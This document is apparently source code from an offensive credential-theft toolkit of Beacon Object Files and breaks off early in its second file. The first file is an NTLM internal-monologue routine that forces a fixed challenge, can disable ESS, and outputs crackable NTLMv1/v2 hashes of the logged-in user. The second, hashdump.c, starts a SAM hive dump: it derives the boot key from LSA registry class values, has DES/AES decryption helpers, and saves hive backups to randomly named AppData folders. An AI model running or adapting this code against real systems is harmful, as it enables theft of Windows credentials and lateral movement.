WINBASEAPI SECURITY_STATUS WINAPI SECUR32$FreeCredentialsHandle(PCredHandle phCredential);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$DeleteSecurityContext(PCtxtHandle phContext);

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

#define MAX_TOKEN_SIZE 12288

BOOL IsCredHandleValid(CredHandle *phCred)
{
    return phCred && (phCred->dwLower != (ULONG_PTR) -1) && (phCred->dwUpper != (ULONG_PTR) -1);
}

BOOL IsCtxtHandleValid(CtxtHandle *phCtx)
{
    return phCtx && (phCtx->dwLower != (ULONG_PTR) -1) && (phCtx->dwUpper != (ULONG_PTR) -1);
}

BYTE* StringToByteArray(const char* hex) {
    if (!hex) return NULL;

    size_t numChars = MSVCRT$strlen(hex);
    if (numChars == 0) return NULL;

    if (numChars % 2 != 0) {
        BeaconPrintf(CALLBACK_ERROR, "StringToByteArray: hex string has odd length: %zu\n", numChars);
        return NULL;
    }

    size_t outLen = numChars / 2;
    BYTE* bytes = (BYTE*)MSVCRT$calloc(outLen, sizeof(BYTE));
    if (!bytes) {
        BeaconPrintf(CALLBACK_ERROR, "StringToByteArray: calloc failed for %zu bytes\n", outLen);
        return NULL;
    }

    for (size_t i = 0; i < outLen; ++i) {
        char buf[3] = { hex[i*2], hex[i*2 + 1], '\0' };
        char* endptr = NULL;
        long v = my_strtol(buf, &endptr, 16);
        if (endptr == buf || v < 0 || v > 0xFF) {
            MSVCRT$free(bytes);
            BeaconPrintf(CALLBACK_ERROR, "StringToByteArray: invalid hex at pos %zu\n", i*2);
            return NULL;
        }
        bytes[i] = (BYTE)v;
    }

    return bytes;
}

char* ByteArrayToString(const unsigned char* ba, size_t ba_length) {
    if (!ba) return NULL;

    size_t needed = ba_length * 2 + 1;
    char * hex = (char *)MSVCRT$calloc(needed, sizeof(char));
    if (!hex) {
        BeaconPrintf(CALLBACK_ERROR, "ByteArrayToString: calloc failed for %zu bytes\n", needed);
        return NULL;
    }

    for (size_t i = 0; i < ba_length; ++i) {
        MSVCRT$sprintf(hex + i * 2, "%02x", ba[i]);
    }
    hex[ba_length * 2] = '\0';
    return hex;
}

char* ByteArrayToUnicodeString(const BYTE* ba, size_t ba_length) {
    if (!ba) return NULL;
    if (ba_length == 0) return NULL;

    size_t unicode_chars = ba_length / 2;
    char * str = (char *)MSVCRT$calloc(unicode_chars + 1, sizeof(char));
    if (!str) {
        BeaconPrintf(CALLBACK_ERROR, "ByteArrayToUnicodeString: calloc failed\n");
        return NULL;
    }

    for (size_t i = 0; i < unicode_chars; ++i) {
        str[i] = (char)ba[i * 2];
    }

    str[unicode_chars] = '\0';
    return str;
}

char* FormatNTLMv2Hash(const char* challenge, const BYTE* user, size_t user_length, const BYTE* domain, size_t domain_length, const BYTE* nt_resp, size_t nt_resp_len) {
    if (!challenge || !user || !domain || !nt_resp) return NULL;

    char * user_str = ByteArrayToUnicodeString(user, user_length);
    char * domain_str = ByteArrayToUnicodeString(domain, domain_length);
    if (!user_str || !domain_str) {
        if (user_str) MSVCRT$free(user_str);
        if (domain_str) MSVCRT$free(domain_str);
        return NULL;
    }

    char * nt1 = ByteArrayToString(nt_resp, 16);
    char * nt2 = NULL;
    if (nt_resp_len > 16) nt2 = ByteArrayToString(nt_resp + 16, nt_resp_len - 16);
    else nt2 = ByteArrayToString((const unsigned char*)"", 0);

    if (!nt1 || !nt2) {
        MSVCRT$free(user_str);
        MSVCRT$free(domain_str);
        if (nt1) MSVCRT$free(nt1);
        if (nt2) MSVCRT$free(nt2);
        return NULL;
    }

    size_t needed = MSVCRT$strlen(user_str) + 2 + MSVCRT$strlen(domain_str) + 1 + MSVCRT$strlen(challenge) + 1 +
                    MSVCRT$strlen(nt1) + 1 + MSVCRT$strlen(nt2) + 1;
    char * result = (char *)MSVCRT$calloc(needed, sizeof(char));
    if (!result) {
        BeaconPrintf(CALLBACK_ERROR, "FormatNTLMv2Hash: calloc failed\n");
        MSVCRT$free(user_str); MSVCRT$free(domain_str); MSVCRT$free(nt1); MSVCRT$free(nt2);
        return NULL;
    }

    MSVCRT$sprintf(result, "%s::%s:%s:%s:%s", user_str, domain_str, challenge, nt1, nt2);

    MSVCRT$free(user_str);
    MSVCRT$free(domain_str);
    MSVCRT$free(nt1);
    MSVCRT$free(nt2);

    return result;
}

char* FormatNTLMv1Hash(const char* challenge, const BYTE* user, size_t user_length, const BYTE* domain, size_t domain_length, const BYTE* lm_resp, size_t lm_resp_len, const BYTE* nt_resp, size_t nt_resp_len) {
    if (!challenge || !user || !domain || !lm_resp || !nt_resp) return NULL;

    char * user_str = ByteArrayToUnicodeString(user, user_length);
    char * domain_str = ByteArrayToUnicodeString(domain, domain_length);
    if (!user_str || !domain_str) {
        if (user_str) MSVCRT$free(user_str);
        if (domain_str) MSVCRT$free(domain_str);
        return NULL;
    }

    char * lm_str = ByteArrayToString(lm_resp, lm_resp_len);
    char * nt_str = ByteArrayToString(nt_resp, nt_resp_len);
    if (!lm_str || !nt_str) {
        MSVCRT$free(user_str); MSVCRT$free(domain_str);
        if (lm_str) MSVCRT$free(lm_str);
        if (nt_str) MSVCRT$free(nt_str);
        return NULL;
    }

    size_t needed = MSVCRT$strlen(user_str) + 2 + MSVCRT$strlen(domain_str) + 1 + MSVCRT$strlen(lm_str) + 1 + MSVCRT$strlen(nt_str) + 1 + MSVCRT$strlen(challenge) + 1;
    char * result = (char *)MSVCRT$calloc(needed, sizeof(char));
    if (!result) {
        BeaconPrintf(CALLBACK_ERROR, "FormatNTLMv1Hash: calloc failed\n");
        MSVCRT$free(user_str); MSVCRT$free(domain_str); MSVCRT$free(lm_str); MSVCRT$free(nt_str);
        return NULL;
    }

    MSVCRT$sprintf(result, "%s::%s:%s:%s:%s", user_str, domain_str, lm_str, nt_str, challenge);

    MSVCRT$free(user_str);
    MSVCRT$free(domain_str);
    MSVCRT$free(lm_str);
    MSVCRT$free(nt_str);

    return result;
}

BYTE* GetSecBufferByteArray(const SecBufferDesc* pSecBufferDesc, size_t* pBufferSize) {
    if (!pSecBufferDesc) {
        BeaconPrintf(CALLBACK_ERROR, "GetSecBufferByteArray: SecBufferDesc pointer cannot be null\n");
        return NULL;
    }

    if (!pBufferSize) return NULL;
    *pBufferSize = 0;

    if (pSecBufferDesc->cBuffers != 1) {
        BeaconPrintf(CALLBACK_ERROR, "GetSecBufferByteArray: unexpected cBuffers = %u\n", pSecBufferDesc->cBuffers);
        return NULL;
    }

    SecBuffer* pSecBuffer = pSecBufferDesc->pBuffers;
    if (!pSecBuffer) {
        BeaconPrintf(CALLBACK_ERROR, "GetSecBufferByteArray: pBuffers is NULL\n");
        return NULL;
    }

    if (pSecBuffer->cbBuffer == 0 || pSecBuffer->pvBuffer == NULL) {
        return NULL;
    }

    if (pSecBuffer->cbBuffer > MAX_TOKEN_SIZE * 4) {
        BeaconPrintf(CALLBACK_ERROR, "GetSecBufferByteArray: cbBuffer too large: %u\n", pSecBuffer->cbBuffer);
        return NULL;
    }

    BYTE* buffer  = (BYTE *)MSVCRT$calloc(pSecBuffer->cbBuffer, sizeof(BYTE));
    if (!buffer) {
        BeaconPrintf(CALLBACK_ERROR, "GetSecBufferByteArray: calloc failed\n");
        return NULL;
    }

    MSVCRT$memcpy(buffer, pSecBuffer->pvBuffer, pSecBuffer->cbBuffer);
    *pBufferSize = pSecBuffer->cbBuffer;
    return buffer;
}

void ParseNTResponse(BYTE* message, size_t message_len, const char* challenge) {
    if (!message || message_len < 48) {
        BeaconPrintf(CALLBACK_ERROR, "ParseNTResponse: message empty or too small (%zu)\n", message ? message_len : 0);
        return;
    }
    if (!challenge) {
        BeaconPrintf(CALLBACK_ERROR, "ParseNTResponse: null challenge\n");
        return;
    }

    uint16_t lm_resp_len = 0;
    uint32_t lm_resp_off = 0;
    uint16_t nt_resp_len = 0;
    uint32_t nt_resp_off = 0;
    uint16_t domain_len = 0;
    uint32_t domain_off = 0;
    uint16_t user_len = 0;
    uint32_t user_off = 0;

    MSVCRT$memcpy(&lm_resp_len, message + 12, sizeof(lm_resp_len));
    MSVCRT$memcpy(&lm_resp_off, message + 16, sizeof(lm_resp_off));
    MSVCRT$memcpy(&nt_resp_len, message + 20, sizeof(nt_resp_len));
    MSVCRT$memcpy(&nt_resp_off, message + 24, sizeof(nt_resp_off));
    MSVCRT$memcpy(&domain_len, message + 28, sizeof(domain_len));
    MSVCRT$memcpy(&domain_off, message + 32, sizeof(domain_off));
    MSVCRT$memcpy(&user_len, message + 36, sizeof(user_len));
    MSVCRT$memcpy(&user_off, message + 40, sizeof(user_off));

    #define VALID_RANGE(off, len) ((size_t)(off) + (size_t)(len) <= (size_t)message_len)
    if (!VALID_RANGE(lm_resp_off, lm_resp_len) || !VALID_RANGE(nt_resp_off, nt_resp_len) ||
        !VALID_RANGE(domain_off, domain_len) || !VALID_RANGE(user_off, user_len)) {
        BeaconPrintf(CALLBACK_ERROR, "ParseNTResponse: invalid offsets/lengths (message_len=%zu)\n", message_len);
        return;
    }

    BYTE* lm_resp = (BYTE *)MSVCRT$calloc(lm_resp_len ? lm_resp_len : 1, sizeof(BYTE));
    BYTE* nt_resp = (BYTE *)MSVCRT$calloc(nt_resp_len ? nt_resp_len : 1, sizeof(BYTE));
    BYTE* domain = (BYTE *)MSVCRT$calloc(domain_len ? domain_len : 1, sizeof(BYTE));
    BYTE* user = (BYTE *)MSVCRT$calloc(user_len ? user_len : 1, sizeof(BYTE));

    if ((!lm_resp && lm_resp_len) || (!nt_resp && nt_resp_len) || (!domain && domain_len) || (!user && user_len)) {
        BeaconPrintf(CALLBACK_ERROR, "ParseNTResponse: memory allocation failed\n");
        if (lm_resp) MSVCRT$free(lm_resp);
        if (nt_resp) MSVCRT$free(nt_resp);
        if (domain) MSVCRT$free(domain);
        if (user) MSVCRT$free(user);
        return;
    }

    if (lm_resp_len) MSVCRT$memcpy(lm_resp, message + lm_resp_off, lm_resp_len);
    if (nt_resp_len) MSVCRT$memcpy(nt_resp, message + nt_resp_off, nt_resp_len);
    if (domain_len) MSVCRT$memcpy(domain, message + domain_off, domain_len);
    if (user_len) MSVCRT$memcpy(user, message + user_off, user_len);

    char* netNTLM = NULL;
    if (nt_resp_len == 24) {
        netNTLM = FormatNTLMv1Hash(challenge, user, user_len, domain, domain_len, lm_resp, lm_resp_len, nt_resp, nt_resp_len);
        if (netNTLM) {
            BeaconPrintf(CALLBACK_OUTPUT, "NTLMv1 Response:\n%s\n", netNTLM);
            MSVCRT$free(netNTLM);
        } else {
            BeaconPrintf(CALLBACK_ERROR, "Failed to format NTLMv1 response\n");
        }
    } else if (nt_resp_len > 24) {
        netNTLM = FormatNTLMv2Hash(challenge, user, user_len, domain, domain_len, nt_resp, nt_resp_len);
        if (netNTLM) {
            BeaconPrintf(CALLBACK_OUTPUT, "NTLMv2 Response:\n%s\n", netNTLM);
            MSVCRT$free(netNTLM);
        } else {
            BeaconPrintf(CALLBACK_ERROR, "Failed to format NTLMv2 response\n");
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "Unknown NTLM Response (nt_resp_len=%u)\n", nt_resp_len);
    }

    if (lm_resp) MSVCRT$free(lm_resp);
    if (nt_resp) MSVCRT$free(nt_resp);
    if (domain) MSVCRT$free(domain);
    if (user) MSVCRT$free(user);
}

void GetNTLMCreds(const char* challenge, BOOL DisableESS){

    if (!challenge) {
        BeaconPrintf(CALLBACK_ERROR, "GetNTLMCreds: challenge is NULL\n");
        return;
    }

    SecBufferDesc ClientToken;
    SecBuffer ClientSecBuffer;

    ClientToken.cBuffers = 1;
    ClientToken.ulVersion = SECBUFFER_VERSION;
    ClientToken.pBuffers = &ClientSecBuffer;
    ClientSecBuffer.cbBuffer = MAX_TOKEN_SIZE;
    ClientSecBuffer.pvBuffer = (BYTE *)MSVCRT$calloc(MAX_TOKEN_SIZE, 1);
    ClientSecBuffer.BufferType = SECBUFFER_TOKEN;

    SecBufferDesc ServerToken;
    SecBuffer ServerSecBuffer;
    ServerToken.cBuffers = 1;
    ServerToken.ulVersion = SECBUFFER_VERSION;
    ServerToken.pBuffers = &ServerSecBuffer;
    ServerSecBuffer.cbBuffer = MAX_TOKEN_SIZE;
    ServerSecBuffer.pvBuffer = (BYTE *)MSVCRT$calloc(MAX_TOKEN_SIZE, 1);
    ServerSecBuffer.BufferType = SECBUFFER_TOKEN;

    if (!ClientSecBuffer.pvBuffer || !ServerSecBuffer.pvBuffer) {
        BeaconPrintf(CALLBACK_ERROR, "GetNTLMCreds: failed to allocate token buffers\n");
        if (ClientSecBuffer.pvBuffer) MSVCRT$free(ClientSecBuffer.pvBuffer);
        if (ServerSecBuffer.pvBuffer) MSVCRT$free(ServerSecBuffer.pvBuffer);
        return;
    }

    SECURITY_STATUS SecStatus = 0;

    CredHandle hCred;
    CtxtHandle hClientContext;
    CtxtHandle hServerContext;

    hCred.dwLower = (ULONG_PTR)-1; hCred.dwUpper = (ULONG_PTR)-1;
    hClientContext.dwLower = (ULONG_PTR)-1; hClientContext.dwUpper = (ULONG_PTR)-1;
    hServerContext.dwLower = (ULONG_PTR)-1; hServerContext.dwUpper = (ULONG_PTR)-1;

    TimeStamp expiry;
    expiry.HighPart = 0;
    expiry.LowPart = 0;

    ULONG contextAttr = 0;

    SecStatus = SECUR32$AcquireCredentialsHandleA(NULL, "NTLM", SECPKG_CRED_BOTH, NULL, NULL, 0, NULL, &hCred, &expiry);
    if (SecStatus != SEC_E_OK){
        BeaconPrintf(CALLBACK_ERROR,"AcquireCredentialsHandle failed with %x\n", SecStatus);
        goto cleanup;
    }

    SecStatus = SECUR32$InitializeSecurityContextA(&hCred, NULL, NULL, ISC_REQ_CONNECTION, 0, SECURITY_NATIVE_DREP, NULL, 0, &hClientContext, &ClientToken, &contextAttr, &expiry);
    if (SecStatus != SEC_I_CONTINUE_NEEDED && SecStatus != SEC_E_OK){
        BeaconPrintf(CALLBACK_ERROR,"InitializeSecurityContext (initial) failed with %x\n", SecStatus);
        goto cleanup;
    }

    SecStatus = SECUR32$AcceptSecurityContext(&hCred, NULL, &ClientToken, ISC_REQ_CONNECTION, SECURITY_NATIVE_DREP, &hServerContext, &ServerToken, &contextAttr, &expiry);
    if (SecStatus != SEC_E_OK && SecStatus != SEC_I_CONTINUE_NEEDED){
        BeaconPrintf(CALLBACK_ERROR, "AcceptSecurityContext failed with %x\n", SecStatus);
        goto cleanup;
    }

    size_t serverMessageSize = 0;
    BYTE *serverMessage = GetSecBufferByteArray(&ServerToken, &serverMessageSize);
    if (!serverMessage || serverMessageSize == 0) {
        BeaconPrintf(CALLBACK_ERROR, "GetNTLMCreds: failed to get server message\n");
        goto cleanup;
    }

    BYTE* challengeBytes = StringToByteArray(challenge);
    if (challengeBytes == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"Failed to convert challenge string to byte array or invalid challenge length.\n");
        goto cleanup;
    }

    if (serverMessageSize < 48) {
        BeaconPrintf(CALLBACK_ERROR, "Server message too small (%zu) to patch challenge/flags\n", serverMessageSize);
        goto cleanup;
    }

    if (DisableESS) {
        serverMessage[22] &= 0xF7;
    }

    MSVCRT$memcpy(serverMessage + 24, challengeBytes, 8);
    MSVCRT$memset(serverMessage + 32, 0, 16);

    SecBuffer ServerSecBuffer2;
    ServerSecBuffer2.BufferType = SECBUFFER_TOKEN;
    ServerSecBuffer2.cbBuffer = (ULONG)serverMessageSize;
    ServerSecBuffer2.pvBuffer = serverMessage;
    ServerToken.pBuffers = &ServerSecBuffer2;
    ServerToken.cBuffers = 1;
    ServerToken.ulVersion = SECBUFFER_VERSION;

    SecBuffer ClientSecBuffer2;
    ClientSecBuffer2.BufferType = SECBUFFER_TOKEN;
    ClientSecBuffer2.cbBuffer = MAX_TOKEN_SIZE;
    ClientSecBuffer2.pvBuffer = (BYTE *)MSVCRT$calloc(MAX_TOKEN_SIZE, 1);
    if (!ClientSecBuffer2.pvBuffer) {
        BeaconPrintf(CALLBACK_ERROR, "GetNTLMCreds: calloc failed for client output\n");
        goto cleanup;
    }
    ClientToken.pBuffers = &ClientSecBuffer2;
    ClientToken.cBuffers = 1;
    ClientToken.ulVersion = SECBUFFER_VERSION;

    SecStatus = SECUR32$InitializeSecurityContextA(&hCred, &hClientContext, NULL, ISC_REQ_CONNECTION, 0, SECURITY_NATIVE_DREP, &ServerToken, 0, &hClientContext, &ClientToken, &contextAttr, &expiry);
    if (SecStatus == SEC_E_OK) {
        size_t responseSize = 0;
        BYTE* response = GetSecBufferByteArray(&ClientToken, &responseSize);
        if (response && responseSize > 0) {
            ParseNTResponse(response, responseSize, challenge);
            MSVCRT$free(response);
        } else {
            BeaconPrintf(CALLBACK_ERROR, "GetNTLMCreds: client response empty or extraction failed\n");
        }
    } else if (SecStatus == SEC_E_NO_CREDENTIALS) {
        BeaconPrintf(CALLBACK_ERROR,"The NTLM security package does not contain any credentials\n");
    } else {
        BeaconPrintf(CALLBACK_ERROR,"InitializeSecurityContext (client) failed. Error: %x\n", SecStatus);
    }

cleanup:
    if (IsCredHandleValid(&hCred)) {
        SECUR32$FreeCredentialsHandle(&hCred);
        hCred.dwLower = (ULONG_PTR)-1; hCred.dwUpper = (ULONG_PTR)-1;
    }
    if (IsCtxtHandleValid(&hClientContext)) {
        SECUR32$DeleteSecurityContext(&hClientContext);
        hClientContext.dwLower = (ULONG_PTR)-1; hClientContext.dwUpper = (ULONG_PTR)-1;
    }
    if (IsCtxtHandleValid(&hServerContext)) {
        SECUR32$DeleteSecurityContext(&hServerContext);
        hServerContext.dwLower = (ULONG_PTR)-1; hServerContext.dwUpper = (ULONG_PTR)-1;
    }
    if (ClientSecBuffer.pvBuffer != NULL)   { MSVCRT$free(ClientSecBuffer.pvBuffer); ClientSecBuffer.pvBuffer = NULL; }
    if (ServerSecBuffer.pvBuffer != NULL)   { MSVCRT$free(ServerSecBuffer.pvBuffer); ServerSecBuffer.pvBuffer = NULL; }
    if (ClientSecBuffer2.pvBuffer != NULL)  { MSVCRT$free(ClientSecBuffer2.pvBuffer); ClientSecBuffer2.pvBuffer = NULL; }
    if (serverMessage != NULL)              { MSVCRT$free(serverMessage); serverMessage = NULL; }
    if (challengeBytes != NULL)             { MSVCRT$free(challengeBytes); challengeBytes = NULL; }
}

VOID go(char* buf, int len) {
    datap parser;
    BeaconDataParse(&parser, buf, len);
    BOOL DisableESS = FALSE;
    DisableESS = BeaconDataInt(&parser);
    GetNTLMCreds("1122334455667788", DisableESS);
}


================================================
FILE: Creds-BOF/hashdump/hashdump.c
================================================
#include <stdio.h>
#include <windows.h>
#include "bofdefs.h"
#include "hive_parser.c"
#include "beacon.h"

const BYTE ODD_PARITY[] = {
    1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
    16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
    32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
    49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
    64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
    81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
    97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107, 107, 109, 109, 110, 110,
    112, 112, 115, 115, 117, 117, 118, 118, 121, 121, 122, 122, 124, 124, 127, 127,
    128, 128, 131, 131, 133, 133, 134, 134, 137, 137, 138, 138, 140, 140, 143, 143,
    145, 145, 146, 146, 148, 148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158,
    161, 161, 162, 162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174,
    176, 176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191, 191,
    193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205, 205, 206, 206,
    208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218, 218, 220, 220, 223, 223,
    224, 224, 227, 227, 229, 229, 230, 230, 233, 233, 234, 234, 236, 236, 239, 239,
    241, 241, 242, 242, 244, 244, 247, 247, 248, 248, 251, 251, 253, 253, 254, 254};

// Decrypt data using DES algorithm
BOOL DecryptDES(const BYTE *key, const BYTE *data, BYTE *output)
{
    BCRYPT_ALG_HANDLE hAlg = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    BOOL result = FALSE;

    NTSTATUS status = BCRYPT$BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_DES_ALGORITHM, NULL, 0);
    if (!BCRYPT_SUCCESS(status))
        return FALSE;

    status = BCRYPT$BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_ECB, sizeof(BCRYPT_CHAIN_MODE_ECB), 0);
    if (!BCRYPT_SUCCESS(status)) {
        BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
        return FALSE;
    }

    status = BCRYPT$BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)key, 8, 0);
    if (!BCRYPT_SUCCESS(status)) {
        BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
        return FALSE;
    }

    DWORD cbResult = 0;
    status = BCRYPT$BCryptDecrypt(hKey, (PUCHAR)data, 8, NULL, NULL, 0, output, 8, &cbResult, 0);

    result = BCRYPT_SUCCESS(status);

    BCRYPT$BCryptDestroyKey(hKey);
    BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
    return result;
}

// Decrypt data using AES-CBC algorithm

BOOL DecryptAES_CBC( const BYTE *key, DWORD keyLen,const BYTE *iv,DWORD ivLen, const BYTE *encrypted, DWORD encryptedLen, BYTE **decryptedOut, DWORD *decryptedOutLen)
{
    BCRYPT_ALG_HANDLE hAlg = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    BOOL result = FALSE;

    // Open AES algorithm provider
    NTSTATUS status = BCRYPT$BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
    if (!BCRYPT_SUCCESS(status)) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to open AES algorithm provider\n");
        return FALSE;
    }

    // Set chaining mode to CBC
    status = BCRYPT$BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
    if (!BCRYPT_SUCCESS(status)) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to set chaining mode\n");
        BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
        return FALSE;
    }

    // Generate symmetric key
    status = BCRYPT$BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)key, keyLen, 0);
    if (!BCRYPT_SUCCESS(status)) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to generate symmetric key\n");
        BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
        return FALSE;
    }

    // Allocate output buffer
    *decryptedOut = (BYTE *)AllocateMemory(encryptedLen);
    if (!*decryptedOut) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to allocate memory for decrypted data\n");
        BCRYPT$BCryptDestroyKey(hKey);
        BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
        return FALSE;
    }

    // Decrypt
    DWORD decryptedSize = 0;
    status = BCRYPT$BCryptDecrypt(hKey, (PUCHAR)encrypted, encryptedLen, NULL, (PUCHAR)iv, ivLen, *decryptedOut, encryptedLen, &decryptedSize, 0);
    if (!BCRYPT_SUCCESS(status)) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Decryption failed\n");
        FreeMemory(*decryptedOut);
        *decryptedOut = NULL;
        BCRYPT$BCryptDestroyKey(hKey);
        BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
        return FALSE;
    }

    *decryptedOutLen = decryptedSize;
    BCRYPT$BCryptDestroyKey(hKey);
    BCRYPT$BCryptCloseAlgorithmProvider(hAlg, 0);
    return TRUE;
}

// Enable required privileges
BOOL EnablePrivilege(LPCWSTR privilege)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkp;

    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;

    if (!ADVAPI32$LookupPrivilegeValueA(NULL, privilege, &luid)) {
        KERNEL32$CloseHandle(hToken);
        return FALSE;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = luid;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!ADVAPI32$AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
        KERNEL32$CloseHandle(hToken);
        return FALSE;
    }

    KERNEL32$CloseHandle(hToken);
    return TRUE;
}

// Get current control set from SYSTEM hive
DWORD GetCurrentControlSet(HKEY hSystem)
{
    HKEY hSelect;
    DWORD controlSet = 1;
    DWORD type, value, size = sizeof(DWORD);

    if (ADVAPI32$RegOpenKeyExA(hSystem, "Select", 0, KEY_READ, &hSelect) == ERROR_SUCCESS) {
        if (ADVAPI32$RegQueryValueExA(hSelect, "Current", NULL, &type, (LPBYTE)&value, &size) == ERROR_SUCCESS)
            controlSet = value;
        ADVAPI32$RegCloseKey(hSelect);
    }
    return controlSet;
}

// Helper function to get boot key
BOOL GetBootKey(HKEY hSystem, LPCSTR lsaPath, BYTE *bootKey)
{
    HKEY hLsa;
    BYTE data[80];
    DWORD size = sizeof(data);
    LONG res;

    if (ADVAPI32$RegOpenKeyExA(hSystem, lsaPath, 0, KEY_READ, &hLsa) != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to open key");
        return FALSE;
    }

    const DWORD indices[16] = {0x8, 0x5, 0x4, 0x2, 0xB, 0x9, 0xD, 0x3, 0x0, 0x6, 0x1, 0xC, 0xE, 0xA, 0xF, 0x7};
    const wchar_t *values[] = {L"JD", L"Skew1", L"GBG", L"Data"};

    BYTE bootKeyParts[16];

    for (DWORD i = 0; i < 4; i++)
    {
        // DWORD type, size = 4;
        HKEY hKey;
        wchar_t classValue[256];
        DWORD classValueSize = sizeof(classValue) / 2;

        res = ADVAPI32$RegOpenKeyW(hLsa, values[i], &hKey);
        if (res != ERROR_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to open key");
            return FALSE;
        }
        if (ADVAPI32$RegQueryInfoKeyW(hKey, classValue, &classValueSize, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to read class");
            return FALSE;
        }
        ADVAPI32$RegCloseKey(hKey);

        // Decode the bootkey hex strings
        for (size_t j = 0; j < classValueSize / 2; ++j) {
            MSVCRT$swscanf_s(classValue + j * 2, L"%2hhx", bootKeyParts + i * 4 + j);
        }
    }

    // Permute boot key
    for (DWORD i = 0; i < 16; i++)
        bootKey[i] = bootKeyParts[indices[i]];

    ADVAPI32$RegCloseKey(hLsa);
    return TRUE;
}

// Global pointers for backup paths
char* systemBackupPath __attribute__((section (".data"))) = 0;
char* samBackupPath __attribute__((section (".data"))) = 0;

// Generate random alphanumeric string
void GenerateRandomString(char *buffer, size_t length)
{
    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    for (size_t i = 0; i < length; ++i) {
        buffer[i] = charset[MSVCRT$rand() % (sizeof(charset) - 1)];
    }
    buffer[length] = '\0';
}

// Initialize backup paths with random directories in AppData\Local
void InitializeBackupPaths()
{
    MSVCRT$srand((unsigned int)MSVCRT$time(NULL)); // Seed RNG

    char basePath[MAX_PATH];
    // Get AppData\Local path
    DWORD envLen = KERNEL32$GetEnvironmentVariableA("LOCALAPPDATA", basePath, MAX_PATH);
    if (envLen == 0 || envLen >= MAX_PATH)
        MSVCRT$strcpy_s(basePath, MAX_PATH, "C:\\temp"); // Fallback

    char randPart1[9], randPart2[9];
    GenerateRandomString(randPart1, 8); // 8-character random string
    GenerateRandomString(randPart2, 8); // 8-character random string

    // Allocate and build paths
    systemBackupPath = (char *)AllocateMemory(MAX_PATH);
    samBackupPath = (char *)AllocateMemory(MAX_PATH);
    MSVCRT$sprintf_s(systemBackupPath, MAX_PATH, "%s\\%s", basePath, randPart1);
    MSVCRT$sprintf_s(samBackupPath, MAX_PATH, "%s\\%s", basePath, randPart2);
}

// Remember to free memory during cleanup
void CleanupBackupPaths()
{
    FreeMemory(systemBackupPath);
    FreeMemory(samBackupPath);
}

void go()
{

    InitializeBackupPaths();
    LONG res;
    const char *tempSystemKey = "BACKUP1";

